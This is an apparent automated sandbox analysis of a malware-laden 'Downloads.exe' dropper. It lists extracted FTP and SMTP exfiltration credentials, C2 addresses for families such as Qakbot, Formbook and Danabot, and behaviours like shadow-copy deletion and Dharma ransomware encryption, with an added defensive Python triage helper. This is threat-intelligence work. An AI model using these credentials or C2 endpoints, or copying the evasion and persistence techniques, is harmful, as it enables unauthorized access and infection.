Downloads.exe

General

Target: Downloads.exe
Filesize: 141MB
Completed: 19-11-2020 17:48
Score: 10/10
MD5: 07917bc6f34323a498bbbf68eb446724
SHA1: 6f192776575fe4087684d24a0a5fb07e5a1c76ed
SHA256: a6942a7cce17a9de2ff1679f685796468698f06a45f6e4e97b9ff5027ef35a86

Malware Config

Extracted

Credentials

Protocol: ftp

Host: 45.141.184.35

Port: 21

Username: alex

Password: easypassword

Extracted

Credentials

Protocol: smtp

Host: mail.pro-powersourcing.com

Port: 587

Username: vivi@pro-powersourcing.com

Password: china1977

Extracted

Family azorult
C2

http://kvaka.li/1210776429.php

Extracted

Family formbook
Version 4.0
C2

http://www.worstig.com/w9z/

Decoy

crazzysex.com

hanferd.com

gteesrd.com

bayfrontbabyplace.com

jicuiquan.net

relationshiplink.net

ohchacyberphoto.com

kauegimenes.com

powerful-seldom.com

ketotoken.com

make-money-online-success.com

redgoldcollection.com

hannan-football.com

hamptondc.com

vllii.com

aa8520.com

platform35markethall.com

larozeimmo.com

oligopoly.net

llhak.info

fisioservice.com

tesla-magnumopus.com

cocodrilodigital.com

pinegrovesg.com

traveladventureswithme.com

hebitaixin.com

golphysi.com

gayjeans.com

quickhire.expert

randomviews1.com

eatatnobu.com

topmabati.com

mediaupside.com

spillerakademi.com

thebowtie.store

sensomaticloadcell.com

turismodemadrid.net

yuhe89.com

wernerkrug.com

cdpogo.net

dannynhois.com

realestatestructureddata.com

matewhereareyou.net

laimeibei.ltd

sw328.com

lmwworks.net

xtremefish.com

tonerias.com

dsooneclinicianexpert.com

281clara.com

Extracted

Family gozi_rm3
Botnet 86920224
C2

https://sibelikinciel.xyz

Attributes

build: 300869
exe_type: loader
server_id: 12
url_path: index.htm
rsa_pubkey.plain: (value not shown in the report)
serpent.plain: (value not shown in the report)

Extracted

Family formbook
Version 4.1
C2

http://www.joomlas123.com/i0qi/

http://www.norjax.com/app/

Decoy

mytakeawaybox.com

goutaihuo.com

kuzey.site

uppertenpiercings.amsterdam

honeygrandpa.com

jenniferabramslaw.com

ncarian.com

heavilymeditatedhouston.com

gsbjyzx.com

akisanblog.com

taoyuanreed.com

jasperrvservices.com

yabbanet.com

myhealthfuldiet.com

flipdigitalcoins.com

toes.photos

shoottillyoumiss.com

maserental.com

smarteacher.net

hamdimagdeco.com

wuxifanggang.com

alamediationtraining.com

vfoe.team

kms-sp.com

gfidevfight.net

anomadbackpacker.com

21oms.us

australianseniorpreneur.com

valuereceipt.com

superbetbahis.com

rsrgoup.com

hoidonghuongkimson.com

parmedpharma.com

discoveryoverload.com

livetv247.win

jepekha.com

6o5ttvst.biz

netcorrespondents.com

cscycorp.com

emonkeygraphics.com

tillyaeva-lola.news

dgx9.com

jiucai5.com

justwoodsouthern.com

dentalexpertstraining.com

amazoncarpet.com

xsxnet.net

androidaso.com

jinhucai.com

wellnessitaly.store

Extracted

Family danabot
C2

92.204.160.54

2.56.213.179

45.153.186.47

93.115.21.29

185.45.193.50

193.34.166.247

rsa_pubkey.plain: (value not shown in the report)

Extracted

Family qakbot
Botnet spx129
Campaign 1590734339
C2

94.10.81.239:443

94.52.160.116:443

67.0.74.119:443

175.137.136.79:443

73.232.165.200:995

79.119.67.149:443

62.38.111.70:2222

108.58.9.238:993

216.110.249.252:2222

67.209.195.198:3389

84.247.55.190:443

96.37.137.42:443

94.176.220.76:2222

173.245.152.231:443

96.227.122.123:443

188.192.75.8:995

24.229.245.124:995

71.163.225.75:443

75.71.77.59:443

104.36.135.227:443

173.173.77.164:443

207.255.161.8:2222

68.39.177.147:995

178.193.33.121:2222

72.209.191.27:443

67.165.206.193:995

64.19.74.29:995

117.199.195.112:443

75.87.161.32:995

188.173.214.88:443

173.22.120.11:2222

96.41.93.96:443

86.125.210.26:443

24.10.42.174:443

47.201.1.210:443

69.92.54.95:995

24.202.42.48:2222

47.205.231.60:443

66.26.160.37:443

65.131.44.40:995

24.110.96.149:443

108.58.9.238:443

77.159.149.74:443

74.56.167.31:443

75.137.239.211:443

47.153.115.154:995

173.172.205.216:443

184.98.104.7:995

24.46.40.189:2222

98.115.138.61:443

Signatures: 102

Categories: Collection, Credential Access, Defense Evasion, Discovery, Execution, Impact, Persistence

  • AgentTesla

    Description

    Agent Tesla is a .NET-based information stealer and remote access tool (RAT), originally written in Visual Basic .NET. It exfiltrates harvested credentials over SMTP, FTP or HTTP; the FTP and SMTP credential sets extracted in the Malware Config section above are the kind of exfiltration endpoints such a configuration carries.

  • Azorult

    Description

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

  • CoreEntity .NET Packer

    Description

    CoreEntity is a .NET packer that embeds its payload as a Bitmap resource and decrypts it at run time.

    Reported IOCs

    resource | yara_rule
    behavioral2/memory/2180-672-0x00000000006E0000-0x00000000006E2000-memory.dmp | coreentity
  • Danabot

    Description

    Danabot is a modular banking trojan, first seen in 2018, that steals credentials and is commonly delivered through other malware families' loaders.

  • Danabot x86 payload

    Description

    Detection of Danabot x86 payload, mapped in memory during the execution of its loader.

    Reported IOCs

    resource | yara_rule
    behavioral2/files/0x0003000000010af1-649.dat | family_danabot
    behavioral2/files/0x0003000000010af1-648.dat | family_danabot
    behavioral2/files/0x0003000000010af1-712.dat | family_danabot
    behavioral2/files/0x00030000000135f3-724.dat | family_danabot
    behavioral2/files/0x00030000000135f3-729.dat | family_danabot
    behavioral2/files/0x00030000000135f3-728.dat | family_danabot
    behavioral2/files/0x00030000000135f3-727.dat | family_danabot
    behavioral2/files/0x00030000000135f3-726.dat | family_danabot
    behavioral2/files/0x00030000000135f3-711.dat | family_danabot
    behavioral2/files/0x0003000000010af1-717.dat | family_danabot
    behavioral2/files/0x0003000000010af1-716.dat | family_danabot
    behavioral2/files/0x0003000000010af1-715.dat | family_danabot
  • Dharma

    Description

    Dharma is a ransomware family (a CrySIS variant) that has been delivered alongside a legitimate security-software installer to mask its activity. Encrypted files are renamed to <original name>.id-<victim id>.[<contact e-mail>].<extension>, the pattern visible in the desktop.ini entries under "Drops startup file" below.

  • Formbook

    Description

    Formbook is an information stealer sold as malware-as-a-service since 2016. It grabs web-form data, keystrokes and clipboard contents, steals browser and mail credentials, and can fetch further payloads. Its configuration holds one real C2 URL together with a list of decoy domains that it also contacts, which is why the Decoy lists above should not be treated as C2 indicators.

  • Gozi RM3

    Description

    A heavily modified version of Gozi (ISFB/Ursnif) that uses the RM3 loader.

  • Guloader,Cloudeye

    Description

    A shellcode based downloader first seen in 2020.

  • Modifies Windows Defender Real-time Protection settings

    TTPs

    Modify Registry, Modify Existing Service, Disabling Security Tools
  • Modifies visibility of hidden/system files in Explorer

    TTPs

    Hidden Files and Directories, Modify Registry
  • PlugX

    Description

    PlugX is a RAT (Remote Access Trojan) that has been around since 2008.

  • Pony,Fareit

    Description

    Pony (also known as Fareit) is a credential stealer and loader: it harvests stored passwords from browsers, FTP and mail clients and can download and run further payloads.

  • Qakbot/Qbot

    Description

    Qakbot (Qbot) is a banking trojan with worm-like lateral movement, credential theft and loader capabilities.

  • RMS

    Description

    Remote Manipulator System (RMS) is a remote access tool developed by Russian organization TektonIT.

  • RedLine

    Description

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload

    Reported IOCs

    resource | yara_rule
    behavioral2/files/0x000300000001390d-937.dat | family_redline
    behavioral2/files/0x000300000001390d-969.dat | family_redline
    behavioral2/files/0x000300000001390d-927.dat | family_redline
  • WarzoneRat, AveMaria

    Description

    WarzoneRat is a native RAT developed in C++ with multiple plugins sold as a MaaS.

  • Windows security bypass

    TTPs

    Disabling Security Tools, Modify Registry
  • ACProtect 1.3x - 1.4x DLL software

    Description

    Detects files packed with ACProtect 1.3x to 1.4x.

    Reported IOCs

    resource | yara_rule
    behavioral2/files/0x000300000001318d-127.dat | acprotect
    behavioral2/files/0x000300000001318c-126.dat | acprotect
  • AgentTesla Payload

    Reported IOCs

    resource | yara_rule
    behavioral2/files/0x000300000001323d-365.dat | family_agenttesla
    behavioral2/files/0x000300000001323d-369.dat | family_agenttesla
    behavioral2/memory/1552-734-0x000000000044C82E-mapping.dmp | family_agenttesla
    behavioral2/memory/1552-738-0x0000000000400000-0x0000000000452000-memory.dmp | family_agenttesla
    behavioral2/memory/1552-736-0x0000000000400000-0x0000000000452000-memory.dmp | family_agenttesla
    behavioral2/memory/1552-733-0x0000000000400000-0x0000000000452000-memory.dmp | family_agenttesla
    behavioral2/memory/4700-917-0x000000000044CCFE-mapping.dmp | family_agenttesla
    behavioral2/files/0x000300000001323d-923.dat | family_agenttesla
    behavioral2/files/0x000300000001323d-922.dat | family_agenttesla
    behavioral2/files/0x000200000001147d-947.dat | family_agenttesla
    behavioral2/memory/4700-956-0x0000000000400000-0x0000000000452000-memory.dmp | family_agenttesla
    behavioral2/memory/4948-1074-0x000000000044CB3E-mapping.dmp | family_agenttesla
    behavioral2/memory/4948-1073-0x0000000000400000-0x0000000000452000-memory.dmp | family_agenttesla
    behavioral2/memory/4948-1076-0x0000000000400000-0x0000000000452000-memory.dmp | family_agenttesla
    behavioral2/files/0x000200000001147d-990.dat | family_agenttesla
    behavioral2/memory/4700-954-0x0000000000400000-0x0000000000452000-memory.dmp | family_agenttesla
    behavioral2/files/0x000200000001147d-941.dat | family_agenttesla
    behavioral2/memory/4700-911-0x0000000000400000-0x0000000000452000-memory.dmp | family_agenttesla
    behavioral2/memory/4580-1123-0x0000000000400000-0x0000000000450000-memory.dmp | family_agenttesla
    behavioral2/memory/4580-1124-0x000000000044A49E-mapping.dmp | family_agenttesla
    behavioral2/memory/4580-1126-0x0000000000400000-0x0000000000450000-memory.dmp | family_agenttesla
    behavioral2/memory/3704-1136-0x0000000000090000-0x00000000000E2000-memory.dmp | family_agenttesla
    behavioral2/memory/3704-1134-0x0000000000090000-0x00000000000E2000-memory.dmp | family_agenttesla
    behavioral2/memory/3704-1129-0x000000000044CF8E-mapping.dmp | family_agenttesla
    behavioral2/memory/4580-1127-0x0000000000400000-0x0000000000450000-memory.dmp | family_agenttesla
  • CryptOne packer

    Description

    Detects CryptOne packer defined in NCC blogpost.

    Reported IOCs

    resource | yara_rule
    behavioral2/files/0x000300000001323b-336.dat | cryptone
    behavioral2/files/0x000300000001323b-351.dat | cryptone
    behavioral2/files/0x0003000000013252-542.dat | cryptone
    behavioral2/files/0x0003000000013252-549.dat | cryptone
    behavioral2/files/0x0003000000013252-682.dat | cryptone
    behavioral2/files/0x000300000001383f-883.dat | cryptone
    behavioral2/files/0x000300000001383f-891.dat | cryptone
    behavioral2/files/0x0003000000013252-1036.dat | cryptone
    behavioral2/files/0x0003000000013252-1035.dat | cryptone
    behavioral2/files/0x000300000001383f-1088.dat | cryptone
    behavioral2/files/0x000300000001383f-1090.dat | cryptone
    behavioral2/files/0x0003000000013252-1098.dat | cryptone
    behavioral2/files/0x0003000000013252-1097.dat | cryptone
    behavioral2/files/0x000300000001383f-884.dat | cryptone
    behavioral2/files/0x000300000001383f-1856.dat | cryptone
  • Deletes shadow copies

    Description

    Ransomware often targets backup files to inhibit system recovery.

    TTPs

    File Deletion, Inhibit System Recovery
  • Formbook Payload

    Reported IOCs

    resource | yara_rule
    behavioral2/memory/2148-318-0x0000000000400000-0x000000000042D000-memory.dmp | formbook
    behavioral2/memory/2148-324-0x000000000041E2D0-mapping.dmp | formbook
    behavioral2/memory/2428-379-0x0000000000000000-mapping.dmp | formbook
    behavioral2/memory/3636-591-0x0000000000000000-mapping.dmp | formbook
    behavioral2/memory/2768-1082-0x0000000000000000-mapping.dmp | formbook
    behavioral2/memory/2828-1128-0x0000000000400000-0x000000000042D000-memory.dmp | formbook
    behavioral2/memory/2828-1131-0x000000000041E270-mapping.dmp | formbook
    behavioral2/memory/4560-1165-0x0000000000000000-mapping.dmp | formbook
    behavioral2/memory/1568-1168-0x000000000041E2D0-mapping.dmp | formbook
    behavioral2/memory/4976-1253-0x0000000000000000-mapping.dmp | formbook
    behavioral2/memory/4032-1285-0x000000000041E2D0-mapping.dmp | formbook
    behavioral2/memory/3692-1312-0x0000000000000000-mapping.dmp | formbook
    behavioral2/memory/2412-1392-0x000000000041E2D0-mapping.dmp | formbook
    behavioral2/memory/3580-1565-0x000000000041E2D0-mapping.dmp | formbook
    behavioral2/memory/4424-1599-0x000000000041E2D0-mapping.dmp | formbook
    behavioral2/memory/2428-1610-0x00000000030F0000-0x00000000031FA000-memory.dmp | formbook
    behavioral2/memory/4436-1611-0x0000000000000048-mapping.dmp | formbook
    behavioral2/memory/4616-1621-0x000000000041E270-mapping.dmp | formbook
    behavioral2/memory/2428-1623-0x00000000030F0000-0x00000000031FA000-memory.dmp | formbook
    behavioral2/memory/2568-1624-0x000000000000004C-mapping.dmp | formbook
    behavioral2/memory/5612-1625-0x0000000000000000-mapping.dmp | formbook
  • Grants admin privileges

    Description

    Uses net.exe to modify the user's privileges.

    TTPs

    Account Manipulation
  • Guloader Payload

    Reported IOCs

    resource | yara_rule
    behavioral2/memory/4436-1611-0x0000000000000048-mapping.dmp | family_guloader
    behavioral2/memory/2568-1624-0x000000000000004C-mapping.dmp | family_guloader
  • Looks for VirtualBox Guest Additions in registry

    TTPs

    Query Registry, Virtualization/Sandbox Evasion
  • Nirsoft

    Reported IOCs

    resource | yara_rule
    behavioral2/files/0x0003000000013941-1014.dat | Nirsoft
    behavioral2/files/0x0003000000013941-1027.dat | Nirsoft
    behavioral2/files/0x0003000000013941-1020.dat | Nirsoft
    behavioral2/files/0x0003000000013941-1013.dat | Nirsoft
  • ReZer0 packer

    Description

    Detects ReZer0, a packer with multiple versions used in various campaigns.

    Reported IOCs

    resource | yara_rule
    behavioral2/memory/2180-679-0x0000000004F70000-0x0000000004FC3000-memory.dmp | rezer0
    behavioral2/memory/3956-685-0x0000000004C10000-0x0000000004C61000-memory.dmp | rezer0
    behavioral2/memory/3832-704-0x0000000004C80000-0x0000000004CD3000-memory.dmp | rezer0
    behavioral2/memory/3396-779-0x00000000009D0000-0x00000000009D9000-memory.dmp | rezer0
  • ASPack v2.12-2.42

    Description

    Detects executables packed with ASPack v2.12-2.42

    Reported IOCs

    resource | yara_rule
    behavioral2/files/0x000300000001318a-73.dat | aspack_v212_v242
    behavioral2/files/0x000300000001318a-71.dat | aspack_v212_v242
    behavioral2/files/0x000300000001318a-70.dat | aspack_v212_v242
    behavioral2/files/0x000300000001318a-108.dat | aspack_v212_v242
    behavioral2/files/0x000300000001318a-117.dat | aspack_v212_v242
    behavioral2/files/0x000300000001318a-119.dat | aspack_v212_v242
    behavioral2/files/0x000300000001318a-803.dat | aspack_v212_v242
    behavioral2/files/0x000300000001318a-802.dat | aspack_v212_v242
  • Adds policy Run key to start application
    cmmon32.exe

    TTPs

    Registry Run Keys / Startup FolderModify Registry

    Reported IOCs

    description | ioc | process
    Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run | cmmon32.exe
    Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\VJLHZLDXN = "C:\\Program Files (x86)\\Lgzhxwx\\IconCachenb6h.exe" | cmmon32.exe
  • Blocklisted process makes network request
    rundll32.exe (3 processes: PIDs 3284, 3596, 3800)

    Reported IOCs

    flow | pid | process
    63 | 3284 | rundll32.exe
    69 | 3596 | rundll32.exe
    70 | 3596 | rundll32.exe
    71 | 3800 | rundll32.exe
    78 | 3596 | rundll32.exe
    79 | 3800 | rundll32.exe
    89 | 3596 | rundll32.exe
    90 | 3800 | rundll32.exe
    94 | 3800 | rundll32.exe
    95 | 3800 | rundll32.exe
    113 | 3596 | rundll32.exe
    117 | 3800 | rundll32.exe
    126 | 3596 | rundll32.exe
    127 | 3800 | rundll32.exe
    130 | 3596 | rundll32.exe
    133 | 3800 | rundll32.exe
    149 | 3596 | rundll32.exe
    151 | 3596 | rundll32.exe
    157 | 3800 | rundll32.exe
    167 | 3596 | rundll32.exe
    171 | 3800 | rundll32.exe
    506 | 3596 | rundll32.exe
    507 | 3596 | rundll32.exe
    508 | 3596 | rundll32.exe
    509 | 3596 | rundll32.exe
    512 | 3800 | rundll32.exe
    516 | 3596 | rundll32.exe
    541 | 3800 | rundll32.exe
    544 | 3596 | rundll32.exe
    567 | 3800 | rundll32.exe
    571 | 3596 | rundll32.exe
    582 | 3800 | rundll32.exe
    585 | 3596 | rundll32.exe
    600 | 3800 | rundll32.exe
    601 | 3596 | rundll32.exe
    602 | 3800 | rundll32.exe
    603 | 3800 | rundll32.exe
    604 | 3800 | rundll32.exe
    605 | 3800 | rundll32.exe
    608 | 3800 | rundll32.exe
    610 | 3800 | rundll32.exe
    623 | 3596 | rundll32.exe
    627 | 3800 | rundll32.exe
    638 | 3596 | rundll32.exe
    639 | 3800 | rundll32.exe
    647 | 3596 | rundll32.exe
    649 | 3800 | rundll32.exe
    656 | 3596 | rundll32.exe
    660 | 3800 | rundll32.exe
    670 | 3596 | rundll32.exe
    675 | 3800 | rundll32.exe
    687 | 3596 | rundll32.exe
    689 | 3800 | rundll32.exe
    729 | 3596 | rundll32.exe
    732 | 3800 | rundll32.exe
    735 | 3596 | rundll32.exe
    738 | 3596 | rundll32.exe
    739 | 3800 | rundll32.exe
    743 | 3596 | rundll32.exe
    749 | 3800 | rundll32.exe
    750 | 3596 | rundll32.exe
    770 | 3800 | rundll32.exe
    775 | 3800 | rundll32.exe
    799 | 3596 | rundll32.exe
  • Blocks application from running via registry modification

    Description

    Adds application to list of disallowed applications.

  • Disables Task Manager via registry modification

  • Drops file in Drivers directory
    MSBuild.exe, cmd.exe, update.exe, 24.exe

    Reported IOCs

    description | ioc | process
    File opened for modification | C:\Windows\system32\drivers\etc\hosts | MSBuild.exe
    File opened for modification | C:\Windows\System32\drivers\etc\hosts | cmd.exe
    File opened for modification | C:\Windows\System32\drivers\etc\hosts | update.exe
    File opened for modification | C:\Windows\system32\drivers\etc\hosts | 24.exe
  • Executes dropped EXE
    64 dropped executables launched (listed below)

    Reported IOCs

    pid | process
    1748 | update.exe
    1116 | Treasure.Vault.3D.Screensaver.keygen.by.Paradox.exe
    1248 | Remouse.Micro.Micro.v3.5.3.serial.maker.by.aaocg.exe
    876 | wini.exe
    1632 | winit.exe
    996 | intro.exe
    1320 | keygen-pr.exe
    1604 | keygen-step-1.exe
    1764 | cheat.exe
    316 | keygen-step-4.exe
    1516 | rutserv.exe
    1236 | key.exe
    1940 | 002.exe
    620 | key.exe
    1760 | taskhost.exe
    1600 | rutserv.exe
    2180 | rutserv.exe
    2280 | rutserv.exe
    2356 | Magic_File_v3_keygen_by_KeygenNinja.exe
    2552 | intro.exe
    2580 | keygen-pr.exe
    2688 | keygen-step-1.exe
    2756 | keygen-step-3.exe
    2804 | keygen-step-4.exe
    3060 | 002.exe
    1416 | key.exe
    2624 | key.exe
    1732 | LtHv0O2KZDK4M637.exe
    2696 | keygen-pr.exe
    2876 | keygen-step-3.exe
    2964 | keygen-step-4.exe
    2308 | api.exe
    3036 | 31.exe
    2604 | Setup.exe
    436 | Setup.exe
    488 | 3DMark 11 Advanced Edition.exe
    1076 | 2.exe
    2632 | 3.exe
    2744 | 4.exe
    2148 | 2.exe
    2588 | 5.exe
    2652 | key.exe
    1776 | 6.exe
    1288 | Setup.exe
    1900 | 7.exe
    2352 | 8.exe
    2180 | 9.exe
    2076 | 10.exe
    1844 | 11.exe
    2124 | 12.exe
    1604 | 13.exe
    2648 | 14.exe
    3024 | key.exe
    1944 | 15.exe
    816 | 16.exe
    2012 | 17.exe
    3068 | 18.exe
    3008 | 19.exe
    3304 | setup.exe
    3264 | setup.exe
    3136 | 20.exe
    3384 | 21.exe
    3552 | 22.exe
    3744 | 23.exe
  • Looks for VMWare Tools registry key

    TTPs

    Query Registry, Virtualization/Sandbox Evasion
  • Modifies Windows Firewall

    TTPs

    Modify Existing Service
  • Modifies extensions of user files
    16.exe

    Description

    Ransomware generally changes the extension on encrypted files.

    Reported IOCs

    description | ioc | process
    File opened for modification | C:\Users\Admin\Pictures\ReceiveEnter.tiff | 16.exe
  • Sets DLL path for service in the registry

    TTPs

    Registry Run Keys / Startup Folder, Modify Registry
  • Sets file to hidden

    Description

    Modifies file attributes to stop it showing in Explorer etc.

    TTPs

    Hidden Files and Directories
  • Stops running service(s)

    TTPs

    Modify Existing Service, Service Stop
  • Suspicious Office macro

    Description

    Office document carrying Excel 4.0 (XLM) macros.

    Reported IOCs

    resource | yara_rule
    behavioral2/files/0x00030000000136bd-764.dat | office_xlm_macros
  • UPX packed file

    Description

    Detects executables packed with UPX/modified UPX open source packer.

    Reported IOCs

    resource | yara_rule
    behavioral2/files/0x000300000001318d-127.dat | upx
    behavioral2/files/0x000300000001318c-126.dat | upx
    behavioral2/files/0x0003000000013226-840.dat | upx
    behavioral2/files/0x0003000000013226-823.dat | upx
    behavioral2/files/0x0003000000013226-825.dat | upx
    behavioral2/files/0x0003000000013226-824.dat | upx
    behavioral2/files/0x00030000000136af-850.dat | upx
    behavioral2/files/0x00030000000136af-845.dat | upx
    behavioral2/files/0x00030000000136af-903.dat | upx
    behavioral2/files/0x000300000001391a-938.dat | upx
    behavioral2/files/0x000300000001391a-1009.dat | upx
    behavioral2/files/0x0003000000013226-1012.dat | upx
    behavioral2/files/0x0003000000013941-966.dat | upx
    behavioral2/files/0x0003000000013941-960.dat | upx
    behavioral2/files/0x0003000000013941-959.dat | upx
    behavioral2/files/0x000300000001391a-935.dat | upx
    behavioral2/files/0x0003000000013103-1401.dat | upx
    behavioral2/files/0x000a00000001323b-1595.dat | upx
    behavioral2/files/0x000a00000001323b-1607.dat | upx
  • Checks BIOS information in registry
    11.exe, regsvcojoduf-.exe

    Description

    BIOS information is often read in order to detect sandboxing environments.

    TTPs

    Query Registry, System Information Discovery

    Reported IOCs

    description | ioc | process
    Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | 11.exe
    Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | 11.exe
    Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | regsvcojoduf-.exe
    Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | regsvcojoduf-.exe
  • Checks QEMU agent file
    RegAsm.exe, 3.exe, 23.exe, 28.exe, 7.exe, 3.exe, 15.exe, 13.exe, 19.exe, 19.exe, 25.exe, 31.exe, Styltendeschris.exe, Styltendeschris.exe, 13.exe, 20.exe

    Description

    Checks presence of QEMU agent, possibly to detect virtualization.

    TTPs

    Query Registry, System Information Discovery

    Reported IOCs

    description | ioc | process
    File opened (read-only) | C:\Program Files\Qemu-ga\qemu-ga.exe | RegAsm.exe
    File opened (read-only) | C:\Program Files\Qemu-ga\qemu-ga.exe | 3.exe
    File opened (read-only) | C:\Program Files\Qemu-ga\qemu-ga.exe | 23.exe
    File opened (read-only) | C:\Program Files\Qemu-ga\qemu-ga.exe | 28.exe
    File opened (read-only) | C:\Program Files\Qemu-ga\qemu-ga.exe | 7.exe
    File opened (read-only) | C:\Program Files\Qemu-ga\qemu-ga.exe | 3.exe
    File opened (read-only) | C:\Program Files\Qemu-ga\qemu-ga.exe | 15.exe
    File opened (read-only) | C:\Program Files\Qemu-ga\qemu-ga.exe | 13.exe
    File opened (read-only) | C:\Program Files\Qemu-ga\qemu-ga.exe | 19.exe
    File opened (read-only) | C:\Program Files\Qemu-ga\qemu-ga.exe | 19.exe
    File opened (read-only) | C:\Program Files\Qemu-ga\qemu-ga.exe | 25.exe
    File opened (read-only) | C:\Program Files\Qemu-ga\qemu-ga.exe | 31.exe
    File opened (read-only) | C:\Program Files\Qemu-ga\qemu-ga.exe | Styltendeschris.exe
    File opened (read-only) | C:\Program Files\Qemu-ga\qemu-ga.exe | Styltendeschris.exe
    File opened (read-only) | C:\Program Files\Qemu-ga\qemu-ga.exe | 13.exe
    File opened (read-only) | C:\Program Files\Qemu-ga\qemu-ga.exe | 20.exe
  • Drops startup file
    16.exe, 30.exe

    Reported IOCs

    description | ioc | process
    File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\16.exe | 16.exe
    File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PickerHost.url | 30.exe
    File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini | 16.exe
    File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini.id-ABF639FB.[Bit_decrypt@protonmail.com].BOMBO | 16.exe
    File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini.id-ABF639FB.[Bit_decrypt@protonmail.com].BOMBO | 16.exe
    File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Info.hta | 16.exe
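The desktop.ini.id-ABF639FB.[Bit_decrypt@protonmail.com].BOMBO entries above show the naming scheme this Dharma sample applies to encrypted files: the original name, then ".id-" and an eight-hex-digit victim ID, the attacker contact in square brackets, and a campaign extension. During incident response the victim ID is what gets matched against the ransom note and against decryptor lookups, and the original names are needed for recovery planning. The Python below is an added example written for this page, not code from the sample or from the sandbox; the file listing is constructed from the two encrypted paths in this report plus hypothetical extras, and the grouping key is my own choice.

```python
import re
from collections import defaultdict

# <original name>.id-<8 hex digits>.[<contact>].<extension>, as seen in this report
ENCRYPTED_NAME = re.compile(
    r"^(?P<original>.+?)\.id-(?P<victim_id>[0-9A-Fa-f]{8})"
    r"\.\[(?P<contact>[^\]]+)\]\.(?P<ext>[A-Za-z0-9]+)$"
)


def parse_encrypted_name(name):
    """Return the parts of a Dharma-style file name, or None if it does not match."""
    m = ENCRYPTED_NAME.match(name)
    return m.groupdict() if m else None


def triage_listing(paths):
    """Group encrypted files by (victim id, contact, extension), restoring original paths.

    Returns (groups, unmatched): unmatched holds paths that do not carry the full
    suffix, e.g. ransom notes or a file the encryptor was interrupted on.
    """
    groups, unmatched = defaultdict(list), []
    for path in paths:
        folder, _, name = path.rpartition("\\")
        parts = parse_encrypted_name(name)
        if parts is None:
            unmatched.append(path)
            continue
        key = (parts["victim_id"], parts["contact"], parts["ext"])
        groups[key].append(folder + "\\" + parts["original"])
    return dict(groups), unmatched


# Constructed listing: the two encrypted names from the report above plus hypothetical extras.
SAMPLE_LISTING = [
    r"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini.id-ABF639FB.[Bit_decrypt@protonmail.com].BOMBO",
    r"C:\Users\Admin\Pictures\ReceiveEnter.tiff.id-ABF639FB.[Bit_decrypt@protonmail.com].BOMBO",
    r"C:\Users\Admin\Documents\q3.report.final.docx.id-ABF639FB.[Bit_decrypt@protonmail.com].BOMBO",
    r"C:\Users\Admin\AppData\Roaming\Info.hta",                                       # ransom note
    r"C:\Users\Admin\Documents\notes.txt.id-ABF639FB.[Bit_decrypt@protonmail.com]",  # suffix incomplete
]
```

The non-greedy original-name group matters: names with several dots (q3.report.final.docx) still split at the first ".id-", and a name missing the trailing extension is reported as unmatched rather than silently mis-parsed.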
  • Loads dropped DLL
    update.exe, wini.exe, cmd.exe, keygen-pr.exe, keygen-step-4.exe, cheat.exe, key.exe, Setup.exe

    Reported IOCs (64 load events, one row per process)

    pid | process | load events
    1748 | update.exe | 2
    876 | wini.exe | 4
    240 | cmd.exe | 5
    440 | cmd.exe | 1
    1320 | keygen-pr.exe | 4
    316 | keygen-step-4.exe | 9
    1764 | cheat.exe | 4
    1236 | key.exe | 1
    2328 | cmd.exe | 6
    2804 | keygen-step-4.exe | 8
    2580 | keygen-pr.exe | 4
    1416 | key.exe | 1
    2144 | cmd.exe | 3
    2696 | keygen-pr.exe | 4
    2964 | keygen-step-4.exe | 4
    436 | Setup.exe | 1
    2604 | Setup.exe | 1
    1288 | Setup.exe | 2
  • Modifies file permissions
    icacls.exe (56 invocations)

    TTPs

    File Permissions Modification

    Reported IOCs

    process: icacls.exe
    pids (56, in report order): 844, 2592, 2112, 3480, 1236, 3040, 1376, 2576, 2044, 2588, 2156, 3028, 552, 2988, 2072, 2836, 3488, 1720, 3880, 1920, 2836, 2328, 2112, 3424, 3704, 3296, 2844, 3540, 3464, 1068, 1636, 3640, 1944, 3016, 1844, 3648, 1880, 564, 1772, 1752, 2944, 1476, 2944, 3520, 3756, 4060, 3616, 3236, 3724, 2988, 2532, 3716, 2672, 3652, 4080, 3456
  • Obfuscated with Agile.Net obfuscator

    Description

    Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.

    Reported IOCs

    resource | yara_rule
    behavioral2/memory/2352-484-0x00000000002C0000-0x00000000002CF000-memory.dmp | agile_net
  • Reads data files stored by FTP clients

    Description

    Tries to access configuration files associated with programs like FileZilla.

    TTPs

    Data from Local System, Credentials in Files
  • Reads local data of messenger clients

    Description

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

    TTPs

    Data from Local System, Credentials in Files
  • Reads user/profile data of local email clients

    Description

    Email clients store some user data on disk where infostealers will often target it.

    TTPs

    Data from Local System, Credentials in Files
  • Reads user/profile data of web browsers

    Description

    Infostealers often target stored browser data, which can include saved credentials etc.

    TTPs

    Data from Local System, Credentials in Files
  • Uses the VBS compiler for execution

    TTPs

    Scripting
  • Accesses cryptocurrency files/wallets, possible credential harvesting

    TTPs

    Data from Local System, Credentials in Files
  • Adds Run key to start application
    13.exe, mstsc.exe, Styltendeschris.exe, cmmon32.exe, 16.exe, taskhostw.exe, RegAsm.exe, 3.exe, juppp.exe, reg.exe, hmwmcj.exe, MSBuild.exe

    TTPs

